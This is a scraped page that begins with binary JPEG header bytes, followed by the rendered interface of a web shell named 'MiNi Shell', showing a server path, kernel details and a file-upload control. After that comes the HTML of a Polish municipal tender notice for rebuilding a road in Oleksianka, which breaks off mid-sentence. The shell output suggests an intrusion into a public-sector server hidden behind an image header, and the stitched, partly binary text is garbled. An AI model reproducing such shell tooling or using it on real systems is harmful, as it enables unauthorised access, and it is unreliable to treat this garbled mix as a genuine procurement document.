JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220302/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220302/0007346301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi gminnej nr 220709W w miejscowości Oleksianka </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Latowicz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711582730</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Latowicz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-334</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@gmina-latowicz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">latowicz.samorzady.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi gminnej nr 220709W w miejscowości Oleksianka </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f109f509-9a2d-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00073463</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003476/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Przebudowa drogi gminnej nr 220709W w miejscowości Oleksianka</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Instrukcji<br/>użytkownika systemu miniPortal-ePUAP – dostępnego pod adresem<br/>https://miniportal.uzp.gov.pl/Instrukcja_uzytkownika_miniPortal-ePUAP.pdf<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB. Przepustowość sieci<br/>70Mb/s<br/>Zamawiający dopuszcza przesyłanie plików w formatach danych określonych w rozporządzeniu Rady<br/>Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, w szczególności w<br/>formatach: .pdf, .doc, .docs, .rtf lub .odt, pades, xades Zamawiający zaleca przesyłanie plików w<br/>formacie .pdf .</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „Rozporządzenie”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Wójt Gminy Latowicz ul. Rynek 6, 05-334<br/>Ogłoszenie nr 2022/BZP 00049240/01 z dnia 2022-02-07<br/>2022-02-07 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>Latowicz tel. 25 752 10 90<br/>2. W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem<br/>Ochrony Danych pod adresem e-mail: inspektor@cbi24.pl, lub listownie: Gmina Latowicz, ul. Rynek 6,<br/>05-334 Latowicz<br/>3. Dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego „Budowa(rozbudowa) sieci wodociągowej na terenie gminy Latowicz (I etap)”, Dane<br/>osobowe będą przetwarzane przez okres zgodnie z art. 78 ust. 1 i 4 ustawy z dnia z dnia 11 września<br/>2019 r.– Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019), zwanej dalej PZP, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas obowiązywania umowy.<br/>4. Podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. c) ww. Rozporządzenia w związku z<br/>przepisami PZP.<br/>5. Odbiorcami Pani/Pana danych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 4 PZP.<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z PZP.<br/>7. Osoba, której dane dotyczą ma prawo do:<br/>• dostępu do treści swoich danych oraz możliwości ich poprawiania, sprostowania, ograniczenia<br/>przetwarzania,<br/>• w przypadku gdy przetwarzanie danych odbywa się z naruszeniem przepisów Rozporządzenia służy<br/>prawo wniesienia skargi do organu nadzorczego tj. Prezesa Urzędu Ochrony Danych Osobowych, ul.<br/>Stawki 2, 00-193 Warszawa,</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osobie, której dane dotyczą nie przysługuje:<br/>• w związku z art. 17 ust. 3 lit. b, d lub e Rozporządzenia prawo do usunięcia danych osobowych;<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 Rozporządzenia;<br/>• na podstawie art. 21 Rozporządzenia prawo sprzeciwu, wobec przetwarzania danych osobowych.<br/>10. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Rozporządzenia,<br/>wymagałoby niewspółmiernie dużego wysiłku, Administrator może żądać od osoby, której dane<br/>dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>11. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia<br/>danych osobowych, o którym mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w<br/>zakresie niezgodnym z PZP.<br/>12. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia<br/>publicznego.<br/>13. W przypadku danych osobowych zamieszczonych przez Administratora w Biuletynie Zamówień<br/>Publicznych, prawa, o których mowa w art. 15 i art. 16 Rozporządzenia, są wykonywane w drodze<br/>żądania skierowanego do Administratora.<br/>14. Od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku gdy wniesienie żądania,<br/>o którym mowa w art. 18 ust. 1 Rozporządzenia, spowoduje ograniczenie przetwarzania danych<br/>osobowych zawartych w protokole i załącznikach do protokołu, Administrator nie udostępnia tych<br/>danych zawartych w protokole i w załącznikach do protokołu, chyba że zachodzą przesłanki, o których<br/>mowa w art. 18 ust. 2 Rozporządzenia.<br/>15. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 Rozporządzenia,<br/>wymagałoby niewspółmiernie dużego wysiłku, Administrator może żądać od osoby, której dane<br/>dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy<br/>lub daty zakończonego postępowania o udzielenie zamówienia.<br/>16. Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o<br/>którym mowa w art. 16 Rozporządzenia, nie może naruszać integralności protokołu oraz jego<br/>załączników.<br/>17. Ponadto informujemy, iż w związku z przetwarzaniem Pani/Pana danych osobowych nie podlega<br/>Ogłoszenie nr 2022/BZP 00049240/01 z dnia 2022-02-07<br/>2022-02-07 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>Pan/Pani decyzjom, które się opierają wyłącznie na zautomatyzowanym przetwarzaniu, w tym<br/>profilowaniu, o czym stanowi art. 22 Rozporządzenia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGOŚ.271.8a.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przebudowa drogi gminnej nr 220709W w miejscowości<br/>Oleksianka, gmina Latowicz na dz. ew. 363 obręb Oleksianka. Przebudowę należy wykonać na<br/>odcinku długości 1654,15m. od km 0+016,60 do km 1+670,75 zgodnie z dokumentacją<br/>projektową wykonawczą (w załączeniu). W wyniku realizacji zadania nastąpi wykonanie nowej<br/>nawierzchni drogi składającej sie z warstwy wiążącej (wyrównawczej) gr. 5cm i warstwy<br/>ścieralnej gr. 4cm. Szerokość nowej nawierzchni to 5,5m. Po lewej stronie drogi zostanie<br/>wykonany chodnik szer. 2m na odcinku 1496,25 m i pobocze na odc. 157,90m Po prawej stronie<br/>drogi zostanie wykonane pobocze gruntowe z kruszywa łamanego o szerokości 0,75m na<br/>odcinku długości 1579,15m i chodnik szer. 2 m na odcinku ok.75m. Rowy po obydwu stronach w<br/>pasie drogowym zostaną odmulone i wyprofilowane. Zjazdy po obydwu stronach drogi zostaną<br/>przebudowywane. Przebudowa zjazdów polegała będzie na wymianie przepustów na przepusty<br/>z rur PVC oraz wykonaniu nawierzchni zjazdu z kostki brukowej. Zostaną wymienione też<br/>przepusty poprzeczne pod korona drogi wskazane w dokumentacji projektowej.<br/>Ze względu na konieczność uspokojenia ruchu w związku z ruchem wolnobieżnych pojazdów<br/>rolniczych i zlokalizowaną w pobliżu zabudową wykonanych zostanie 6 szt progów<br/>zwalniających oraz wyspa z odgięciem torów jazdy z kostki brukowej. Wprowadzona zostanie<br/>organizacja ruchu, której elementem będą znaki poziome i pionowe oraz oznakowanie progów<br/>zwalniających przy pomocy elementów odblaskowych -kocich oczek. W celu poprawy<br/>bezpieczeństwa na dojeździe do skrzyżowań zostaną wykonane pasy akustyczne z taśm<br/>grubowarstwowych. W okolicy przystanku autobusowego wykonać przejście dla pieszych.<br/>Roboty obejmowały będą ponadto umocnienie skarby drogi płytami ECO ażurowymi<br/>Przedmiot zamówienia, szczegółowo opisany w załączniku nr 4 do SWZ, obejmuje wykonanie w<br/>ramach ceny ofertowej wszelkich niezbędnych prac pomocniczych i towarzyszących oraz robót<br/>tymczasowych i innych, niezbędnych oraz pominiętych w wycenie i dokumentacji projektowej,<br/>jednak bez których nie będzie można ukończyć obiektu oraz przystąpić do jego użytkowania,<br/>w szczególności:<br/>1) Organizację, zagospodarowanie, utrzymanie i likwidację placu budowy oraz poniesienie<br/>kosztów z tym związanych,<br/>2) Wykonanie lub pozyskanie we własnym zakresie oraz poniesienie kosztów:<br/>Ogłoszenie nr 2022/BZP 00049240/01 z dnia 2022-02-07<br/>2022-02-07 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>- projektów organizacji ruchu na czas prowadzenia robót, uzyskanie niezbędnych opinii<br/>organów, zatwierdzenie projektu przez organ zarządzający ruchem,<br/>- innych opracowań, prac i badań wymaganych dokumentacją projektową,<br/>- dokumentacji powykonawczej z naniesionymi zmianami dokonanymi w trakcie budowy,<br/>potwierdzonymi przez projektanta, kierownika budowy.<br/>- Zorganizowanie i przeprowadzenie niezbędnych prób, pomiarów, badań i sprawdzeń, które są<br/>niezbędne do wykonania przedmiotu zamówienia oraz poniesienie kosztów z tym związanych.<br/>- zapewnienie pełnej obsługi geodezyjnej wraz z wykonaniem inwentaryzacji geodezyjnej<br/>powykonawczej<br/>3) Zabezpieczenie terenu budowy zgodnie z obowiązującymi przepisami, tj. rozporządzeniem<br/>Ministra Infrastruktury z dnia 6 lutego 2003 r. w sprawie bezpieczeństwa i higieny pracy<br/>podczas wykonywania robót budowlanych (Dz.U. z 2003 r. Nr 47, poz. 401).<br/>4) Wykonanie, utrzymanie i likwidację tymczasowej organizacji ruchu, uzyskanie zgód<br/>zarządców dróg na zajęcie pasa drogowego oraz poniesienie kosztów z tym związanych.<br/>5) Doprowadzenie wody oraz zasilania placu budowy w energię elektryczną wraz z<br/>zamontowaniem liczników zużycia wody i energii elektrycznej oraz poniesienie kosztów z tym<br/>związanych wraz z zapłatą za energię, wodę i inne media zużyte w trakcie budowy oraz<br/>wykonywanie prób i prób końcowych.<br/>6) Obsługa archeologiczna i konserwatorska w przypadku wystąpienia sytuacji dla której taka<br/>obsługa jest wymagana.<br/>7) Geodezyjne wytyczenie w terenie tras rurociągów, miejsc posadowienia obiektów i<br/>armatury, kolizji z istniejącym uzbrojeniem podziemnym,<br/>8) Wykonanie odwodnienia wykopów.<br/>9) Uzyskanie zgody dostawców mediów wraz z poniesieniem opłat za: pobór energii<br/>elektrycznej dla potrzeb prowadzonej budowy, wody do celów socjalnych i technologicznych,<br/>zrzut wód z odwadniania wykopów, wodę zużytą do płukania rurociągów, ścieki z zaplecza<br/>budowy itp.<br/>10) Zapewnienie i zabezpieczenie dostępu do posesji w miejscach prowadzenia robót.<br/>11) Zabezpieczenie istniejącego uzbrojenia podziemnego kolidującego z projektowanymi<br/>przewodami, a w miejscach występowania kolizji prowadzenie prac pod nadzorem eksploatatora<br/>kolidującej sieci oraz ponoszenie kosztów ewentualnego nadzoru.<br/>12) Zabezpieczenie mienia Wykonawcy zgromadzonego w miejscu składowania i na terenie<br/>wykonywanych robót.<br/>13) Wywóz nadmiaru ziemi lub dowóz ziemi wraz z jej zakupem , jeżeli taka konieczność<br/>wystąpi, ewentualna wymiana gruntów lub ich zagęszczenie .<br/>14) Uporządkowanie po zakończeniu robót terenu budowy.<br/>15) Przygotowanie dokumentacji powykonawczej w rozumieniu przepisów ustawy z dnia 7<br/>lipca 1994 r. - Prawo budowlane ( Dz. U. z 2020 r., poz. 1333 z późn. zm.), w tym: protokołów<br/>odbiorów technicznych, instrukcji obsługi, protokołów badań, aprobat technicznych, atestów,<br/>deklaracji zgodności itp. i uzyskanie prawomocnej decyzji pozwolenia na użytkowanie lub<br/>skuteczne zgłoszenie zakończenia zadania w nadzorze budowlanym w imieniu i na rzecz<br/>Inwestora<br/>16) Utrzymanie terenu budowy w stanie wolnym od przeszkód komunikacyjnych oraz<br/>usuwanie na bieżąco zbędnych materiałów, odpadów i śmieci oraz poniesienie kosztów z tym<br/>związanych.<br/>Roboty składające się na przedmiot zamówienia muszą być wykonane zgodnie z<br/>obowiązującymi przepisami (w szczególności ustawy prawo budowlane, przepisami bhp i p.poż<br/>oraz branżowymi), jak również zgodnie z zasadami wiedzy technicznej, a także z należytą<br/>starannością, zachowaniem właściwej organizacji pracy i zapewnieniem dobrej jakości.<br/>Materiały stosowane przez Wykonawcę podczas realizacji przedmiotu umowy powinny być<br/>fabrycznie nowe i odpowiadać, co do jakości, wymogom wyrobów dopuszczonych do obrotu i<br/>Ogłoszenie nr 2022/BZP 00049240/01 z dnia 2022-02-07<br/>2022-02-07 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>stosowania w budownictwie, zgodnie z art. 10 ustawy z dnia 7 lipca 1994 roku Prawo budowlane<br/>,zwanej dalej „ustawą prawo budowlane” lub „prawem budowlanym”, oraz jakościowym i<br/>gatunkowym wymaganiom określonym w opisie przedmiotu zamówienia .<br/>1. Wszystkie użyte materiały, wyroby oraz urządzenia muszą mieć aktualne dokumenty (atesty,<br/>aprobaty i deklaracje zgodności) dopuszczające do stosowania w budownictwie, zgodnie z<br/>przepisami obowiązującymi w tym zakresie.<br/>2. Wykonawca robót ponosi odpowiedzialność za jakość wykonywanych robót oraz<br/>zastosowanych materiałów.<br/>3. Na każde żądanie Inwestora, Wykonawca zobowiązany jest okazać, w stosunku do<br/>wskazanych materiałów (krajowe deklaracje zgodności), aprobatę techniczną oraz wymagane<br/>atesty (kartę charakterystyki), krajową ocenę techniczną wydaną przez upoważnioną instytucję<br/>krajową.<br/>4. Materiały uznane przez Zamawiającego za posiadające wady lub niezgodne z specyfikacją<br/>techniczną wykonania i odbioru robót budowlanych muszą być niezwłocznie usunięte przez<br/>Wykonawcę z terenu budowy. Wykonawca nie ma prawa wykonywać robót z użyciem<br/>materiałów, które nie zostały zaakceptowane przez Inwestora.<br/>5. Wykonawca zapewni odpowiednie warunki sanitarno-epidemiologiczne zgodnie z<br/>obowiązującymi przepisami w zakresie zapobiegania COVID 19<br/>6. Wszystkie roboty należy wykonać zgodnie z dokumentacją projektową, niniejszymi<br/>wytycznymi oraz obowiązującymi przepisami prawa budowlanego i wymaganiami właściwych<br/>norm, a także zasadami wiedzy technicznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu i<br/>spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają poniższe warunki<br/>udziału w postępowaniu:<br/>1) Zdolność do występowania w obrocie gospodarczym - Zamawiający nie stawia warunków w<br/>tym zakresie.<br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów,<br/>Zamawiający nie 